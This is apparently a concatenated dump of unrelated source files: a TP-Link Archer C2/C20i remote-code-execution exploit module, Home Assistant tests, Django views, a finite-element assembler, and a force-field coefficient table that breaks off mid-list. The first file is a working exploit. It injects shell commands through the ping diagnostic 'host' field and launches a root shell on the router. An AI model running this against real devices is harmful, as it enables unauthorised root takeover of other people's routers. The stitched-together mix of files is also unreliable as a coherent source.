2022-03-08T19:07:16.000Z
|
maza/modules/exploits/routers/tplink/archer_c2_c20i_rce.py
|
ArturSpirin/maza
|
56ae6325c08bcedd22c57b9fe11b58f1b38314ca
|
[
"MIT"
] | null | null | null |
maza/modules/exploits/routers/tplink/archer_c2_c20i_rce.py
|
ArturSpirin/maza
|
56ae6325c08bcedd22c57b9fe11b58f1b38314ca
|
[
"MIT"
] | null | null | null |
import time
from maza.core.exploit import *
from maza.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
__info__ = {
"name": "TP-Link Archer C2 & C20i",
"description": "Exploits TP-Link Archer C2 and Archer C20i remote code execution vulnerability "
"that allows executing commands on operating system level with root privileges.",
"authors": (
"Michal Sajdak <michal.sajdak[at]securitum.pl", # vulnerability discovery
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
"references": (
"http://sekurak.pl/tp-link-root-bez-uwierzytelnienia-urzadzenia-archer-c20i-oraz-c2/", # only in polish
),
"devices": (
"TP-Link Archer C2",
"TP-Link Archer C20i",
),
}
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(80, "Target HTTP port")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command shell")
print_status("It is blind command injection so response is not available")
# requires testing
shell(self, architecture="mipsbe", method="wget", location="/tmp")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def execute(self, cmd):
referer = "{}/mainFrame.htm".format(self.target)
headers = {
"Content-Type": "text/plain",
"Referer": referer
}
data = ("[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\r\n"
"dataBlockSize=64\r\n"
"timeout=1\r\n"
"numberOfRepetitions=1\r\n"
"host=127.0.0.1;" + cmd + ";\r\n"
"X_TP_ConnName=ewan_ipoe_s\r\n"
"diagnosticsState=Requested\r\n")
# send command
self.http_request(
method="POST",
path="/cgi?2",
headers=headers,
data=data
)
data = ("[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n")
# execute command on device
self.http_request(
method="POST",
path="/cgi?7",
headers=headers,
data=data
)
time.sleep(1)
return ""
@mute
def check(self):
referer = self.get_target_url(path="/mainFrame.htm")
headers = {
"Content-Type": "text/plain",
"Referer": referer
}
data = (
"[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\r\n"
"dataBlockSize=64\r\n"
"timeout=1\r\n"
"numberOfRepetitions=1\r\n"
"host=127.0.0.1\r\n"
"X_TP_ConnName=ewan_ipoe_s\r\n"
"diagnosticsState=Requested\r\n"
)
response = self.http_request(
method="POST",
path="/cgi?2",
headers=headers,
data=data
)
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and "[error]0" in response.text:
return True # target is vulnerable
return False # target is not vulnerable
| 30.792453
| 116
| 0.531863
|
34afd19310fd4a206f92e1e972abe21243788f44
| 4,046
|
py
|
Python
|
tests/components/homematicip_cloud/test_hap.py
|
petewill/home-assistant
|
5859dba4344f05fb8774aa1207e47ac28f627a67
|
[
"Apache-2.0"
] | 3
|
2020-01-21T18:09:09.000Z
|
2022-01-17T08:06:03.000Z
|
tests/components/homematicip_cloud/test_hap.py
|
petewill/home-assistant
|
5859dba4344f05fb8774aa1207e47ac28f627a67
|
[
"Apache-2.0"
] | 39
|
2016-12-16T12:40:34.000Z
|
2017-02-13T17:53:42.000Z
|
tests/components/homematicip_cloud/test_hap.py
|
petewill/home-assistant
|
5859dba4344f05fb8774aa1207e47ac28f627a67
|
[
"Apache-2.0"
] | 3
|
2020-01-11T15:44:13.000Z
|
2022-01-17T08:06:09.000Z
|
"""Test HomematicIP Cloud accesspoint."""
from unittest.mock import Mock, patch
import pytest
from homeassistant.exceptions import ConfigEntryNotReady
from homeassistant.components.homematicip_cloud import hap as hmipc
from homeassistant.components.homematicip_cloud import const, errors
from tests.common import mock_coro, mock_coro_func
async def test_auth_setup(hass):
"""Test auth setup for client registration."""
config = {
const.HMIPC_HAPID: "ABC123",
const.HMIPC_PIN: "123",
const.HMIPC_NAME: "hmip",
}
hap = hmipc.HomematicipAuth(hass, config)
with patch.object(hap, "get_auth", return_value=mock_coro()):
assert await hap.async_setup() is True
async def test_auth_setup_connection_error(hass):
"""Test auth setup connection error behaviour."""
config = {
const.HMIPC_HAPID: "ABC123",
const.HMIPC_PIN: "123",
const.HMIPC_NAME: "hmip",
}
hap = hmipc.HomematicipAuth(hass, config)
with patch.object(hap, "get_auth", side_effect=errors.HmipcConnectionError):
assert await hap.async_setup() is False
async def test_auth_auth_check_and_register(hass):
"""Test auth client registration."""
config = {
const.HMIPC_HAPID: "ABC123",
const.HMIPC_PIN: "123",
const.HMIPC_NAME: "hmip",
}
hap = hmipc.HomematicipAuth(hass, config)
hap.auth = Mock()
with patch.object(
hap.auth, "isRequestAcknowledged", return_value=mock_coro(True)
), patch.object(
hap.auth, "requestAuthToken", return_value=mock_coro("ABC")
), patch.object(
hap.auth, "confirmAuthToken", return_value=mock_coro()
):
assert await hap.async_checkbutton() is True
assert await hap.async_register() == "ABC"
async def test_hap_setup_works(aioclient_mock):
"""Test a successful setup of a accesspoint."""
hass = Mock()
entry = Mock()
home = Mock()
entry.data = {
hmipc.HMIPC_HAPID: "ABC123",
hmipc.HMIPC_AUTHTOKEN: "123",
hmipc.HMIPC_NAME: "hmip",
}
hap = hmipc.HomematicipHAP(hass, entry)
with patch.object(hap, "get_hap", return_value=mock_coro(home)):
assert await hap.async_setup() is True
assert hap.home is home
assert len(hass.config_entries.async_forward_entry_setup.mock_calls) == 8
assert hass.config_entries.async_forward_entry_setup.mock_calls[0][1] == (
entry,
"alarm_control_panel",
)
assert hass.config_entries.async_forward_entry_setup.mock_calls[1][1] == (
entry,
"binary_sensor",
)
async def test_hap_setup_connection_error():
"""Test a failed accesspoint setup."""
hass = Mock()
entry = Mock()
entry.data = {
hmipc.HMIPC_HAPID: "ABC123",
hmipc.HMIPC_AUTHTOKEN: "123",
hmipc.HMIPC_NAME: "hmip",
}
hap = hmipc.HomematicipHAP(hass, entry)
with patch.object(
hap, "get_hap", side_effect=errors.HmipcConnectionError
), pytest.raises(ConfigEntryNotReady):
await hap.async_setup()
assert len(hass.async_add_job.mock_calls) == 0
assert len(hass.config_entries.flow.async_init.mock_calls) == 0
async def test_hap_reset_unloads_entry_if_setup():
"""Test calling reset while the entry has been setup."""
hass = Mock()
entry = Mock()
home = Mock()
home.disable_events = mock_coro_func()
entry.data = {
hmipc.HMIPC_HAPID: "ABC123",
hmipc.HMIPC_AUTHTOKEN: "123",
hmipc.HMIPC_NAME: "hmip",
}
hap = hmipc.HomematicipHAP(hass, entry)
with patch.object(hap, "get_hap", return_value=mock_coro(home)):
assert await hap.async_setup() is True
assert hap.home is home
assert len(hass.services.async_register.mock_calls) == 0
assert len(hass.config_entries.async_forward_entry_setup.mock_calls) == 8
hass.config_entries.async_forward_entry_unload.return_value = mock_coro(True)
await hap.async_reset()
assert len(hass.config_entries.async_forward_entry_unload.mock_calls) == 8
| 32.629032
| 81
| 0.681167
|
fb0d7fb79c0bbb54318ea5c44bfcf7b3db23a62c
| 434
|
py
|
Python
|
redirink/links/tests/conftest.py
|
Egor4ik325/redirink
|
17ef85f48145ee6112f2fcbab60dcd9d65ba78bf
|
[
"MIT"
] | null | null | null |
redirink/links/tests/conftest.py
|
Egor4ik325/redirink
|
17ef85f48145ee6112f2fcbab60dcd9d65ba78bf
|
[
"MIT"
] | null | null | null |
redirink/links/tests/conftest.py
|
Egor4ik325/redirink
|
17ef85f48145ee6112f2fcbab60dcd9d65ba78bf
|
[
"MIT"
] | 1
|
2021-12-31T00:46:31.000Z
|
2021-12-31T00:46:31.000Z
|
import factory
import pytest
from redirink.links.tests.factories import LinkFactory
@pytest.fixture
def link_dict():
"""Return the dictionary of all model fields with the actual values not serial values."""
return factory.build(dict, FACTORY_CLASS=LinkFactory)
@pytest.fixture
def link_data(link_dict):
"""Data for creating link as in request.data."""
data = link_dict.copy()
del data["user"]
return data
| 22.842105
| 93
| 0.735023
|
7ac2e6c22490ee815a257fa12933a5caf6d3c0b9
| 1,658
|
py
|
Python
|
iaso/views.py
|
BLSQ/iaso-copy
|
85fb17f408c15e8c2d730416d1312f58f8db39b7
|
[
"MIT"
] | null | null | null |
iaso/views.py
|
BLSQ/iaso-copy
|
85fb17f408c15e8c2d730416d1312f58f8db39b7
|
[
"MIT"
] | null | null | null |
iaso/views.py
|
BLSQ/iaso-copy
|
85fb17f408c15e8c2d730416d1312f58f8db39b7
|
[
"MIT"
] | 1
|
2022-03-23T16:44:12.000Z
|
2022-03-23T16:44:12.000Z
|
from django.shortcuts import get_object_or_404, render
from django.contrib.auth.decorators import resolve_url
from django.contrib.auth.views import redirect_to_login
from django.http import HttpResponse, JsonResponse
from django.conf import settings
from iaso.models import Page, Account, TEXT, IFRAME
from hat.__version__ import DEPLOYED_ON, DEPLOYED_BY, VERSION
def page(request, page_slug):
page = get_object_or_404(Page, slug=page_slug)
path = request.get_full_path()
resolved_login_url = resolve_url(settings.LOGIN_URL)
print()
if page.needs_authentication and ((not request.user.is_authenticated) or (request.user not in page.users.all())):
return redirect_to_login(path, resolved_login_url, "next")
if page.type == IFRAME:
return render(request, "iaso/pages/iframe.html", {"src": page.content, "title": page.name})
if page.type == TEXT:
return render(request, "iaso/pages/text.html", {"text": page.content, "title": page.name})
return HttpResponse(page.content)
def health(request):
"""This is used by aws health check to verify the environment is up
it just looks at the 200 status code and not at the content.
"""
res = {
"up": "ok",
"env": settings.ENVIRONMENT,
"database": settings.DATABASES["default"]["NAME"],
"DEPLOYED_ON": DEPLOYED_ON,
"DEPLOYED_BY": DEPLOYED_BY,
"VERSION": VERSION,
}
# noinspection PyBroadException
try:
# mostly to check we can connect to the db
res["account_count"] = Account.objects.count()
except:
res["error"] = "db_fail"
return JsonResponse(res)
| 35.276596
| 117
| 0.69421
|
fae27094774bc243274a88087e74b242a3bc567d
| 4,565
|
py
|
Python
|
FE_code/assembler.py
|
leolapidus/Concrete_Design_Tool
|
7553f50d3db05e3a6c290e35acdc5d8bd1c51130
|
[
"BSD-4-Clause"
] | 1
|
2019-06-12T13:23:28.000Z
|
2019-06-12T13:23:28.000Z
|
FE_code/assembler.py
|
leolapidus/Concrete_Design_Tool
|
7553f50d3db05e3a6c290e35acdc5d8bd1c51130
|
[
"BSD-4-Clause"
] | null | null | null |
FE_code/assembler.py
|
leolapidus/Concrete_Design_Tool
|
7553f50d3db05e3a6c290e35acdc5d8bd1c51130
|
[
"BSD-4-Clause"
] | null | null | null |
"""This module only contains the Assembler class.
"""
class Assembler(object):
"""An Assembler helps to generate system matrices/vectors from elements.
Attributes
----------
dofs : list
List of all dofs in the system. The Dofs with dirichlet constraints are at the end.
dof_indices : dict
Dictionary containing the index of each dof. The index is equal to the position of the dof
in the dofs-list.
dof_count : int
Total number of dofs.
free_dof_count : int
Number of dofs without dirichlet constraints.
fixed_dof_count : int
Number of dofs with dirichlet constraints.
element_freedom_table : list
List with tuples containing the elements and the coresponding dof indices.
"""
def __init__(self, model):
"""Create a new Assembler
Parameters
----------
model : Model
Model to assemble.
"""
# --- dof indices
processed_dofs = set()
free_dofs = list()
fixed_dofs = list()
for element in model.elements:
for dof in element.dofs:
if dof in processed_dofs:
continue
else:
processed_dofs.add(dof)
if dof in model.dirichlet_conditions:
fixed_dofs.append(dof)
else:
free_dofs.append(dof)
dofs = free_dofs + fixed_dofs
dof_indices = {dof: index for index, dof in enumerate(dofs)}
# --- element freedom table
element_freedom_table = list()
for element in model.elements:
indices = [dof_indices[dof] for dof in element.dofs]
element_freedom_table.append((element, indices))
# --- store
self.dofs = dofs
self.dof_indices = dof_indices
self.dof_count = len(dofs)
self.free_dof_count = len(free_dofs)
self.fixed_dof_count = len(fixed_dofs)
self.element_freedom_table = element_freedom_table
def index_of_dof(self, dof):
"""Get the index of the given dof.
Parameters
----------
dof : object
Dof at the index.
Returns
-------
index : int
Index of the given dof.
"""
return self.dof_indices[dof]
def dof_at_index(self, index):
"""Get the dof at the given index.
Parameters
----------
index : int
Index of the dof.
Returns
-------
dof : object
Dof at the given index.
"""
return self.dofs[index]
@property
def free_dofs(self):
"""Get a list with the unconstrained dofs
Returns
-------
free_dofs : list
List with the unconstrained dofs
"""
return self.dofs[:self.free_dof_count]
def assemble_matrix(self, system_matrix, calculate_element_matrix):
"""Assemble element matrices into a system matrix.
Parameters
----------
system_matrix : ndarray
System matrix to store the results. The results are added to the existing values.
calculate_element_matrix : function Element -> ndarray
Function to calculate the element matrix.
"""
for element, indices in self.element_freedom_table:
element_matrix = calculate_element_matrix(element)
if element_matrix is None:
continue
for element_row, system_row in enumerate(indices):
for element_col, system_col in enumerate(indices):
value = element_matrix[element_row, element_col]
system_matrix[system_row, system_col] += value
def assemble_vector(self, system_vector, calculate_element_vector):
"""Assemble element vectors into a system vector.
Parameters
----------
system_vector : ndarray
System vector to store the results. The results are added to the existing values.
calculate_element_vector : function Element -> ndarray
Function to calculate the element vector.
"""
for element, indices in self.element_freedom_table:
element_vector = calculate_element_vector(element)
if element_vector is None:
continue
for element_row, system_row in enumerate(indices):
system_vector[system_row] += element_vector[element_row]
| 28.354037
| 98
| 0.583133
|
179fbb4c3310c8b0842511224bbf7254c01f4a1c
| 143,172
|
py
|
Python
|
renormalizer/tests/c2h4_para.py
|
shuaigroup/Renormalizer
|
963d52efdaa247320e781a96b64d41c9cadf6f0e
|
[
"Apache-2.0"
] | 27
|
2019-09-02T08:35:01.000Z
|
2022-02-22T08:18:02.000Z
|
renormalizer/tests/c2h4_para.py
|
shuaigroup/Renormalizer
|
963d52efdaa247320e781a96b64d41c9cadf6f0e
|
[
"Apache-2.0"
] | 54
|
2019-08-30T12:18:39.000Z
|
2022-03-20T13:23:07.000Z
|
renormalizer/tests/c2h4_para.py
|
shuaigroup/Renormalizer
|
963d52efdaa247320e781a96b64d41c9cadf6f0e
|
[
"Apache-2.0"
] | 6
|
2019-09-10T03:25:28.000Z
|
2021-11-20T18:41:58.000Z
|
omega_std = [824.968669, 950.188990, 966.387896, 1050.809275, 1246.763896,
1369.382703, 1478.480613, 1672.569007, 3140.914743, 3156.837275,
3222.891944, 3248.709300]
ff = [
[0,0 , 1.41288301794e-05],
[0,0,0,0 , 2.22492076101e-08],
[0,0,0,0,0,0 , -3.10551186628e-11],
[0,0,0,0,0,11 , -7.26291340977e-13],
[0,0,0,0,1,1 , -6.12553875342e-12],
[0,0,0,0,2,2 , -6.30224606552e-12],
[0,0,0,0,3,3 , -6.44487341672e-12],
[0,0,0,0,4,4 , -2.12875437546e-11],
[0,0,0,0,4,10 , 3.52687388745e-12],
[0,0,0,0,5 , -9.39984494208e-11],
[0,0,0,0,5,5 , -1.10206835151e-11],
[0,0,0,0,5,7 , 1.45254612482e-11],
[0,0,0,0,5,9 , -2.20078106393e-13],
[0,0,0,0,6,6 , -3.04592811113e-11],
[0,0,0,0,6,8 , 4.47851017301e-12],
[0,0,0,0,7 , -6.48717324093e-11],
[0,0,0,0,7,7 , -1.69493253641e-11],
[0,0,0,0,7,9 , -5.05360934554e-12],
[0,0,0,0,8,8 , 4.97730111499e-11],
[0,0,0,0,9 , 1.11265638717e-09],
[0,0,0,0,9,9 , 5.21263773641e-11],
[0,0,0,0,10,10 , 5.46502281134e-11],
[0,0,0,0,11,11 , 5.5197505969e-11],
[0,0,0,1,1,11 , 5.01686194045e-13],
[0,0,0,1,2,4 , 5.04413100802e-12],
[0,0,0,1,2,10 , -1.27005736013e-13],
[0,0,0,1,3 , 3.83674669227e-11],
[0,0,0,1,3,5 , -4.05001368788e-12],
[0,0,0,1,3,7 , 4.32698056225e-12],
[0,0,0,1,3,9 , 1.70726509009e-12],
[0,0,0,2,2,11 , -6.28147158272e-13],
[0,0,0,2,3,6 , 6.09047975074e-12],
[0,0,0,2,3,8 , -1.07846679749e-12],
[0,0,0,3,3,11 , 8.30894105488e-13],
[0,0,0,4,4,11 , 4.36710591606e-12],
[0,0,0,4,5,6 , -1.59086300774e-11],
[0,0,0,4,5,8 , 2.64240532027e-12],
[0,0,0,4,6 , 1.15809066702e-10],
[0,0,0,4,6,7 , 1.83727722139e-11],
[0,0,0,4,6,9 , 6.05100806234e-12],
[0,0,0,4,7,8 , -5.52726674843e-12],
[0,0,0,4,8 , 8.58095563644e-10],
[0,0,0,4,8,9 , 4.4388490067e-11],
[0,0,0,4,10,11 , 4.81058248874e-11],
[0,0,0,5,5,11 , -4.81698201706e-12],
[0,0,0,5,6,10 , -2.6557387901e-12],
[0,0,0,5,7,11 , 1.84753953056e-12],
[0,0,0,5,8,10 , 3.39759275242e-11],
[0,0,0,5,9,11 , 3.5885978756e-11],
[0,0,0,5,11 , 7.01638175953e-10],
[0,0,0,6,6,11 , -2.44774767926e-12],
[0,0,0,6,7,10 , -3.43273973467e-13],
[0,0,0,6,8,11 , 5.37860739883e-11],
[0,0,0,6,9,10 , 5.50423736313e-11],
[0,0,0,6,10 , 1.05740655704e-09],
[0,0,0,7,7,11 , 1.19487751661e-12],
[0,0,0,7,8,10 , -4.06038814786e-11],
[0,0,0,7,9,11 , -4.12283979314e-11],
[0,0,0,7,11 , -8.03242112835e-10],
[0,0,0,8,8,11 , -7.32527653147e-12],
[0,0,0,8,9,10 , -8.52799650223e-12],
[0,0,0,8,10 , -9.39341349794e-11],
[0,0,0,9,9,11 , -9.2445497443e-12],
[0,0,0,9,11 , -1.23329441012e-10],
[0,0,0,10,10,11 , 6.92834140918e-12],
[0,0,0,11 , -1.48238983012e-09],
[0,0,0,11,11,11 , 7.39043557548e-12],
[0,0,1,1 , 4.74913930966e-09],
[0,0,1,1,1,1 , -6.72661525461e-12],
[0,0,1,1,2,2 , -6.36141601168e-12],
[0,0,1,1,3,3 , -5.34181839976e-12],
[0,0,1,1,4,4 , -4.35598889942e-12],
[0,0,1,1,4,10 , 7.39254386686e-13],
[0,0,1,1,5 , 6.61221888288e-12],
[0,0,1,1,5,5 , -2.67656396466e-12],
[0,0,1,1,5,7 , 2.82902834437e-12],
[0,0,1,1,5,9 , 2.80621626601e-13],
[0,0,1,1,6,6 , -6.53587003626e-12],
[0,0,1,1,6,8 , 2.96664826642e-13],
[0,0,1,1,7 , -1.25634943601e-11],
[0,0,1,1,7,7 , -3.44232141935e-12],
[0,0,1,1,7,9 , -1.09685319073e-12],
[0,0,1,1,8,8 , 1.72640479111e-11],
[0,0,1,1,9 , 3.36942708276e-10],
[0,0,1,1,9,9 , 1.67552060212e-11],
[0,0,1,1,10,10 , 2.00990960848e-11],
[0,0,1,1,11,11 , 1.8729696297e-11],
[0,0,1,2,4,11 , -5.65033485027e-13],
[0,0,1,2,5,6 , 3.85907658337e-12],
[0,0,1,2,5,8 , 3.17983714874e-13],
[0,0,1,2,6 , 1.14285549062e-11],
[0,0,1,2,6,7 , -4.61720134476e-12],
[0,0,1,2,6,9 , -2.15740985603e-13],
[0,0,1,2,7,8 , 7.70497729403e-13],
[0,0,1,2,8 , -3.49236055932e-10],
[0,0,1,2,8,9 , -1.79905104723e-11],
[0,0,1,2,10,11 , -2.0187060732e-11],
[0,0,1,3,4,6 , -4.96617531001e-12],
[0,0,1,3,4,8 , 1.42283282027e-12],
[0,0,1,3,5,11 , -1.45178495677e-13],
[0,0,1,3,6,10 , -1.62005947233e-13],
[0,0,1,3,7,11 , -5.79013596251e-13],
[0,0,1,3,8,10 , 1.79831216488e-11],
[0,0,1,3,9,11 , 1.75506254085e-11],
[0,0,1,3,11 , 3.31842051368e-10],
[0,0,2,2 , 5.82442838338e-09],
[0,0,2,2,2,2 , -7.54501216235e-12],
[0,0,2,2,3,3 , -5.77194043628e-12],
[0,0,2,2,4,4 , -4.56850688475e-12],
[0,0,2,2,4,10 , 5.07109465983e-13],
[0,0,2,2,5 , -2.81958688005e-11],
[0,0,2,2,5,5 , -2.57988886227e-12],
[0,0,2,2,5,7 , 3.14045460755e-12],
[0,0,2,2,5,9 , -6.82506862895e-13],
[0,0,2,2,6,6 , -6.14777411623e-12],
[0,0,2,2,6,8 , -9.88655318975e-14],
[0,0,2,2,7 , 7.06789131296e-12],
[0,0,2,2,7,7 , -3.74059554917e-12],
[0,0,2,2,7,9 , -4.93826277389e-13],
[0,0,2,2,8,8 , 1.84337173371e-11],
[0,0,2,2,9 , 3.6718818237e-10],
[0,0,2,2,9,9 , 1.81961937705e-11],
[0,0,2,2,10,10 , 2.01880693781e-11],
[0,0,2,2,11,11 , 2.08085722878e-11],
[0,0,2,3,4 , -3.02695308086e-11],
[0,0,2,3,4,5 , 3.35722854318e-12],
[0,0,2,3,4,7 , -3.78386322449e-12],
[0,0,2,3,4,9 , -1.58655754186e-12],
[0,0,2,3,5,10 , 4.02755469891e-13],
[0,0,2,3,6,11 , 2.79365159093e-13],
[0,0,2,3,7,10 , 3.65932985232e-13],
[0,0,2,3,8,11 , -1.83521616378e-11],
[0,0,2,3,9,10 , -1.83039347903e-11],
[0,0,2,3,10 , -3.52400991543e-10],
[0,0,3,3 , 4.39819295325e-09],
[0,0,3,3,3,3 , -4.90227760259e-12],
[0,0,3,3,4,4 , -4.56082218217e-12],
[0,0,3,3,4,10 , 8.60051487095e-13],
[0,0,3,3,5 , 3.1690901593e-11],
[0,0,3,3,5,5 , -2.69586905098e-12],
[0,0,3,3,5,7 , 2.59722888925e-12],
[0,0,3,3,5,9 , 8.79625206016e-13],
[0,0,3,3,6,6 , -5.31400911966e-12],
[0,0,3,3,6,8 , 1.02524201815e-12],
[0,0,3,3,7 , -2.10003237607e-11],
[0,0,3,3,7,7 , -3.11984751886e-12],
[0,0,3,3,7,9 , -1.39867587616e-12],
[0,0,3,3,8,8 , 1.6516200446e-11],
[0,0,3,3,9 , 3.16170522604e-10],
[0,0,3,3,9,9 , 1.57976030212e-11],
[0,0,3,3,10,10 , 1.71640155278e-11],
[0,0,3,3,11,11 , 1.68956602586e-11],
[0,0,4,4 , 9.73958258014e-09],
[0,0,4,4,4,4 , -1.74387693498e-11],
[0,0,4,4,4,10 , 3.87700273422e-12],
[0,0,4,4,5 , 9.31567131051e-11],
[0,0,4,4,5,5 , -9.0059856688e-12],
[0,0,4,4,5,7 , 9.93553286755e-12],
[0,0,4,4,5,9 , 3.70324655762e-12],
[0,0,4,4,6,6 , -2.10387458481e-11],
[0,0,4,4,6,8 , 5.47637268575e-12],
[0,0,4,4,7 , -1.05366898425e-10],
[0,0,4,4,7,7 , -1.12536265229e-11],
[0,0,4,4,7,9 , -5.66572492841e-12],
[0,0,4,4,8,8 , 3.84594842328e-11],
[0,0,4,4,9 , 7.35416720189e-10],
[0,0,4,4,9,9 , 3.81771435356e-11],
[0,0,4,4,10,10 , 4.16094839498e-11],
[0,0,4,4,11,11 , 4.16549534289e-11],
[0,0,4,5,5,10 , -1.36415762145e-12],
[0,0,4,5,6,11 , -1.12468120453e-12],
[0,0,4,5,7,10 , 6.24611745242e-14],
[0,0,4,5,8,11 , 3.04614712315e-11],
[0,0,4,5,9,10 , 3.07613922016e-11],
[0,0,4,5,10 , 5.70985957948e-10],
[0,0,4,6,6,10 , -1.20442192663e-12],
[0,0,4,6,7,11 , -8.23211682935e-13],
[0,0,4,6,8,10 , 4.67011831804e-11],
[0,0,4,6,9,11 , 4.69547908571e-11],
[0,0,4,6,11 , 8.71624326133e-10],
[0,0,4,7,7,10 , 2.11808864247e-12],
[0,0,4,7,8,11 , -3.51766728427e-11],
[0,0,4,7,9,10 , -3.51815946954e-11],
[0,0,4,7,10 , -6.69717117921e-10],
[0,0,4,8,8,10 , -7.43031772264e-12],
[0,0,4,8,9,11 , -8.67069937432e-12],
[0,0,4,8,11 , -1.4436817374e-10],
[0,0,4,9,9,10 , -9.80066841373e-12],
[0,0,4,9,10 , -1.74168909752e-10],
[0,0,4,10 , -3.73184467274e-09],
[0,0,4,10,10,10 , 5.48981115333e-12],
[0,0,4,10,11,11 , 5.14633558794e-12],
[0,0,5 , -1.14428258274e-07],
[0,0,5,5 , 8.18938345108e-09],
[0,0,5,5,5 , -1.25968919438e-10],
[0,0,5,5,5,5 , -3.92299082346e-12],
[0,0,5,5,5,7 , 6.12106043049e-12],
[0,0,5,5,5,9 , -3.22596482946e-12],
[0,0,5,5,6,6 , -1.24701774717e-11],
[0,0,5,5,6,8 , -1.76923012693e-12],
[0,0,5,5,7 , 4.59505673099e-11],
[0,0,5,5,7,7 , -7.29503290679e-12],
[0,0,5,5,7,9 , 1.3605508258e-12],
[0,0,5,5,8,8 , 2.10172680982e-11],
[0,0,5,5,9 , 4.52997407793e-10],
[0,0,5,5,9,9 , 2.26459607879e-11],
[0,0,5,5,10,10 , 2.36845019647e-11],
[0,0,5,5,11,11 , 2.50271812352e-11],
[0,0,5,6,6 , -3.77249603291e-11],
[0,0,5,6,6,7 , 1.44654368692e-11],
[0,0,5,6,6,9 , -8.65801505119e-13],
[0,0,5,6,7,8 , 3.47708493133e-14],
[0,0,5,6,8 , 6.22285751631e-10],
[0,0,5,6,8,9 , 3.39655893947e-11],
[0,0,5,6,10,11 , 3.81212713502e-11],
[0,0,5,7 , -7.14034190999e-09],
[0,0,5,7,7 , -9.85949891017e-12],
[0,0,5,7,7,7 , 8.20925628362e-12],
[0,0,5,7,7,9 , 5.9235057468e-13],
[0,0,5,7,8,8 , -2.54920080408e-11],
[0,0,5,7,9 , -4.97566934048e-10],
[0,0,5,7,9,9 , -2.60589519443e-11],
[0,0,5,7,10,10 , -2.90307011256e-11],
[0,0,5,7,11,11 , -2.96526968e-11],
[0,0,5,8,8 , -4.25108718919e-11],
[0,0,5,8,8,9 , -5.10035393161e-12],
[0,0,5,8,10,11 , 4.59593249059e-12],
[0,0,5,9 , -1.71610600975e-09],
[0,0,5,9,9 , -9.77847821021e-11],
[0,0,5,9,9,9 , -5.9482082069e-12],
[0,0,5,9,10,10 , 3.82801403586e-12],
[0,0,5,9,11,11 , 4.521831854e-12],
[0,0,5,10,10 , 1.53548829818e-10],
[0,0,5,11,11 , 1.54290485872e-10],
[0,0,6,6 , 1.28688447241e-08],
[0,0,6,6,6,6 , -3.07744355724e-11],
[0,0,6,6,6,8 , -9.45931145853e-13],
[0,0,6,6,7 , 2.14083811117e-11],
[0,0,6,6,7,7 , -1.70988890826e-11],
[0,0,6,6,7,9 , -1.6812118543e-12],
[0,0,6,6,8,8 , 5.1450800144e-11],
[0,0,6,6,9 , 9.90687910377e-10],
[0,0,6,6,9,9 , 5.22040655702e-11],
[0,0,6,6,10,10 , 5.92324059365e-11],
[0,0,6,6,11,11 , 5.8281242089e-11],
[0,0,6,7,7,8 , 2.57610321811e-12],
[0,0,6,7,8 , -7.38580851522e-10],
[0,0,6,7,8,9 , -3.90736023452e-11],
[0,0,6,7,10,11 , -4.48618142617e-11],
[0,0,6,8 , -2.93898473666e-09],
[0,0,6,8,8,8 , -9.58472005134e-12],
[0,0,6,8,9 , -1.99015822709e-10],
[0,0,6,8,9,9 , -1.23026453563e-11],
[0,0,6,8,10,10 , 3.99660792567e-12],
[0,0,6,8,11,11 , 3.93989844568e-12],
[0,0,6,9,10,11 , 2.45821662834e-12],
[0,0,6,10,11 , 1.43062057101e-10],
[0,0,7 , 8.05743303988e-08],
[0,0,7,7 , 7.89448428619e-09],
[0,0,7,7,7 , -2.53602673229e-11],
[0,0,7,7,7,7 , -9.27385358916e-12],
[0,0,7,7,7,9 , -2.41463541249e-12],
[0,0,7,7,8,8 , 2.89628974434e-11],
[0,0,7,7,9 , 5.71231597864e-10],
[0,0,7,7,9,9 , 2.89556348523e-11],
[0,0,7,7,10,10 , 3.40847368419e-11],
[0,0,7,7,11,11 , 3.42459255163e-11],
[0,0,7,8,8 , 2.30693801862e-10],
[0,0,7,8,8,9 , 1.33565400469e-11],
[0,0,7,8,10,11 , 1.96752208058e-12],
[0,0,7,9 , 4.61996720708e-09],
[0,0,7,9,9 , 2.6065549769e-10],
[0,0,7,9,9,9 , 1.62717997247e-11],
[0,0,7,9,10,10 , 3.68604643397e-12],
[0,0,7,9,11,11 , 2.71853647429e-12],
[0,0,7,10,10 , -7.05702727395e-12],
[0,0,7,11,11 , -1.40132666441e-11],
[0,0,8 , -1.58670446844e-18],
[0,0,8,8 , -5.41205791937e-08],
[0,0,8,8,8 , -1.07524981644e-20],
[0,0,8,8,8,8 , -9.92371424521e-11],
[0,0,8,8,9 , -2.25892607061e-09],
[0,0,8,8,9,9 , -1.00106599821e-10],
[0,0,8,8,10,10 , -1.0876441467e-10],
[0,0,8,8,11,11 , -1.09647743874e-10],
[0,0,8,9,10,11 , -1.09848235417e-10],
[0,0,8,10,11 , -2.46572287916e-09],
[0,0,9 , -1.03044025211e-06],
[0,0,9,9 , -5.38820274845e-08],
[0,0,9,9,9 , -2.21579383384e-09],
[0,0,9,9,9,9 , -1.10456371096e-10],
[0,0,9,9,10,10 , -1.11765534515e-10],
[0,0,9,9,11,11 , -1.11578269201e-10],
[0,0,9,10,10 , -2.48321145903e-09],
[0,0,9,11,11 , -2.46714289926e-09],
[0,0,10 , 1.18028747244e-19],
[0,0,10,10 , -5.78787808728e-08],
[0,0,10,10,10,10 , -1.19180318758e-10],
[0,0,10,10,11,11 , -1.19715423258e-10],
[0,0,11,11 , -5.68500862989e-08],
[0,0,11,11,11,11 , -1.22657611884e-10],
[0,1,1,1,1,11 , 1.34847266721e-12],
[0,1,1,1,2,4 , 5.04610102202e-12],
[0,1,1,1,2,10 , -1.83285949989e-13],
[0,1,1,1,3 , 3.34998276304e-11],
[0,1,1,1,3,5 , -3.92710834543e-12],
[0,1,1,1,3,7 , 4.28112152342e-12],
[0,1,1,1,3,9 , 1.78346472849e-12],
[0,1,1,2,2,11 , -9.4293056666e-14],
[0,1,1,2,3,6 , 6.47797325159e-12],
[0,1,1,2,3,8 , -1.22411417835e-12],
